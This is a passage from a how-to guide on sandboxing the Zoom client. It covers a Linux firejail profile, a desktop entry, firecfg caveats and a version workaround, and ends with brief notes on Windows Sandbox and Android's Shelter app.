start the sandbox, prefix your command with “firejail.”
Make a configuration file for Zoom in .config/firejail/
. Here is the
configuration file named as the main Zoom run executable: ZoomLauncher.profile
(given the running executable is ZoomLauncher):
# Note: to delete all firejail profiles for all local trusted apps
# run sudo firecfg --clean
# ----------------------------------------------------------------
# Duplication of zoom configs in noblacklist and whitelist
# sections fixes login credentials no save problem:
noblacklist ${HOME}/.config/zoomus.conf
noblacklist ${HOME}/.zoom
include /etc/firejail/disable-common.inc
include /etc/firejail/disable-devel.inc
include /etc/firejail/disable-programs.inc
include /etc/firejail/disable-passwdmgr.inc
whitelist ${HOME}/bin/zoom
whitelist ${HOME}/.config/zoomus.conf
whitelist ${HOME}/.zoom
whitelist ${HOME}/.cache/zoom
whitelist ${HOME}/downloads
include /etc/firejail/whitelist-common.inc
caps.drop all
netfilter
nodvd
nonewprivs
noroot
notv
protocol unix,inet,inet6
seccomp
private-tmp
# Needed for latest versions of Zoom and perhaps certain other Qt/QML apps
env QML_DISABLE_DISK_CACHE=1
Now Zoom client can be started from the firejail sandbox:
firejail /path_to_safe_install_location/bin/zoom/ZoomLauncher
To make it possible to use standard graphical menus, one need
to make a zoom.desktop startup file in the user's directory
.local/share/applications
. The Exec entry of the file must include the
firejail-based startup:
[Desktop Entry]
Name=Zoom Desktop [Jailed]
GenericName=Zoom videoconferencing
Comment=Zoom Desktop Client jailed
Exec=firejail /path_to_safe_install_location/bin/zoom/ZoomLauncher %f
Icon=zoom.png
Terminal=false
Type=Application
Categories=Network;Internet;Education;Qt;
X-SuSE-translate=false
Firejail caveats
Firejail can start serving all user's applications in its jail, which is
often too restrictive (e.g. settings are not saved).
-
To force reconfiguring all application to run in firejail do (do not do
this if you are unsure) this:
sudo firecfg
-
To disable configuring all local applications to run in jail, do this:
sudo firecfg --clean
-
Do this (sudo firecfg --clean
) if you have problems starting applications
after installing firejail.
-
To check if an application is by default starting in a jail, run it
from the terminal. If terminal shows several lines like Reading profile
/etc/firejail/disable-common.inc
then the application runs in a jail.
A newer version of Zoom client (3.5.374815.0324) refused to run in a jailed
environment and hanged.
A workaround for running recent Zoom in jail:
add the below line env QML_DISABLE_DISK_CACHE=1
to the firejail config file.
QML_DISABLE_DISK_CACHE
Disables the disk cache and forces re-compilation
from source for all QML and JavaScript files. (from QML Documentation)
How to increase privacy and security of using Zoom on Microsoft Windows
Here is a link on sandbox in Windows 10: How to
use Windows sandbox.
I have not tested how this works.
Android sandbox
For Android, one solution is to use the open source Shelter application,
then mobile Zoom can run in a secure container.
I have been running several programs that I do not like to give access to
my data within Shelter. It works fine for me.
Advantages:
-
Contacts (address book) are not leaked to Zoom if a separate address book
is used within shelter
-
All apps can be frozen to avoid them run all the time at the background,
this reduces the chances of data leaks as well as battery drain. Freezing
can be done automatically, after timeout.
Links